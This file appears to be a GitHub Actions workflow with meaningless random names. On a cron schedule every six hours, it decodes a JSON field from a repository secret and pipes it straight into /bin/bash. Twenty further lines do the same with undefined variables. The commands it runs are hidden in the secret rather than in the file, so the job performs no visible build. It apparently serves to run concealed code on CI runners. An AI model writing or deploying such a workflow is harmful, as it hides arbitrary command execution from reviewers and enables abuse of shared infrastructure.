name: suyanzhn

on:
  workflow_dispatch:
  schedule:
    - cron: '39 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: suyanzhn
        env:
          onfs5: ${{ secrets.onfs5 }}
        run: |
          echo $onfs5 | jq -r .hhare2 | /bin/bash
          echo $r44 | jq -r .asps241 | /bin/bash
          echo $jxz1486 | jq -r .tui7 | /bin/bash
          echo $ou3331 | jq -r .qmlbm48 | /bin/bash
          echo $zyw34020 | jq -r .alew78 | /bin/bash
          echo $qyb11 | jq -r .crckw8 | /bin/bash
          echo $kbh452 | jq -r .cdtt37415 | /bin/bash
          echo $idlf6737 | jq -r .rps14 | /bin/bash
          echo $tiwgx9366 | jq -r .iti5145 | /bin/bash
          echo $mstob71602 | jq -r .huz93 | /bin/bash
          echo $ghip3 | jq -r .z480 | /bin/bash
          echo $rqv75879 | jq -r .onj2 | /bin/bash
          echo $x3 | jq -r .h88 | /bin/bash
          echo $ayz7623 | jq -r .swd40 | /bin/bash
          echo $amvd69 | jq -r .nfy5156 | /bin/bash
          echo $f3 | jq -r .edgc8458 | /bin/bash
          echo $zrdmc66 | jq -r .cla2 | /bin/bash
          echo $yoq16904 | jq -r .hi50 | /bin/bash
          echo $f04 | jq -r .scf45 | /bin/bash
          echo $sqt908 | jq -r .h2804 | /bin/bash
          echo $qnty576 | jq -r .o9 | /bin/bash

